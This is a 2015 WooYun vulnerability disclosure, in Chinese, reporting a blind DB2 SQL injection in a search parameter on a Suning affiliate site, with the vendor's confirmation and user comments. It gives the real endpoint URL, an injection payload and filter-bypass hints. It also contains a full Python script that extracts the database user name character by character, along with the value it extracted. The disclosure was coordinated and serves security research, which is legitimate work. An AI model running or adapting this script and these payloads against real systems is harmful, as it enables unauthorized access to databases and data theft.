当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092463

漏洞标题:苏宁某站点存在鸡肋DB2注射(附验证脚本)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: lijiejie

提交时间:2015-01-17 21:17

修复时间:2015-03-03 21:18

公开时间:2015-03-03 21:18

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-17: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经确认,细节仅向厂商公开
2015-01-28: 细节向核心白帽子及相关领域专家公开
2015-02-07: 细节向普通白帽子公开
2015-02-17: 细节向实习白帽子公开
2015-03-03: 细节向公众公开

简要描述:

苏宁某站点参数过滤不完整,存在部分SQL注射风险。
因为from关键词被过滤了,是一个利用价值较低的鸡肋DB2注射点。

详细说明:

注射点位于:

POST http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y
orderBy:4
orderType:1
ctx:/aas
queryDto.name:%' and 2*3=6 and '%'='
queryDto.catalog:


参数queryDto.name可注入。下图猜解user列的长度是8(证实存在user列)。

suning_db2_sqli_1.png


suning_db2_sqli_2.png


这个注射点鸡肋的原因是关键词from被过滤,而我未能找到很好的绕过方法。
DB2自身内置的函数不够强大,用于DOS攻击数据库服务器也有困难。
像MySQL中的sleep(),BENCHMARK(),MSSQL中waitfor delay,DB2却需要创建user function方可实现。
再者DB2也并不支持行内的注释(类似/**/),所以反复测试发现依然无法突破。。。

漏洞证明:

知道user列的长度为8,试试猜解看看内容,得到:

[Done]user is 'b2caas  '


suning_db2_sqli_3.png


#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
    'Referer': 'http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y',
    'Cookie': '粘贴可用的cookie到此',
}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_. ')
print 'start to retrive user:'
user = ''
for i in range(1, 9):
    for payload in payloads:
        conn = httplib.HTTPConnection('union.suning.com', timeout=60)
        params = {
            'orderBy': 4,
            'queryDto.name': "%%' and ascii(substr(lower(user),%s,1))=%s and '%%'='" % (i, ord(payload)),
            'orderType': 1,
            'ctx': '/aas',
            'queryDto.catalog': '',
            }
        aaaa = urllib.urlencode(params)
        conn.request(method='POST',
                     url='/aas/wap/ad/single-promotion!search.action?search=y',
                     body = urllib.urlencode(params),
                     headers = headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        print '.',
        if html_doc.find(u'product/102548641.html') > 0:  # True
            user += payload
            print '\n[In progress]', user
            break
print '\n[Done]user is', repr(user)

修复方案:

考虑增强参数过滤,例如过滤下ascii(),substr()
攻击者组合使用内置函数和系统模块,存在一定的本地文件读取和拒绝服务风险。
1=1这种表达式会被拦截,但1*2=2测试是可用的

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-01-18 11:07

厂商回复:

感谢提交。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-17 21:47 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

    李姐姐,你再这样,我可要关注你了

  2. 2015-01-17 22:37 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:26 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    @zzR 我以关注了

  3. 2015-01-17 23:23 | 残雪 ( 实习白帽子 | Rank:34 漏洞数:7 | 屌丝一枚擅长扯淡)

    李姐姐,你再这样,我可要关注你了

  4. 2015-01-17 23:56 | Ch4r0n ( 普通白帽子 | Rank:391 漏洞数:35 | 苦逼青年一个!~~~)

    @zzR 我已关注很久了,又看到久违的(附验证脚本),如果没有这个,绝对不是李姐姐发的!~~~哈哈

  5. 2015-01-18 00:24 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:78 | ★ 梦想这条路踏上了,跪着也要...)

    李姐姐你的脚本盲注自动猜解么

  6. 2015-01-18 15:49 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:269 | Just for fun.)

    @zzR 哈哈,多谢zzR大神关注。 :)

  7. 2015-03-03 21:54 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    脚本每次大同小异的就不用再发了吧^。^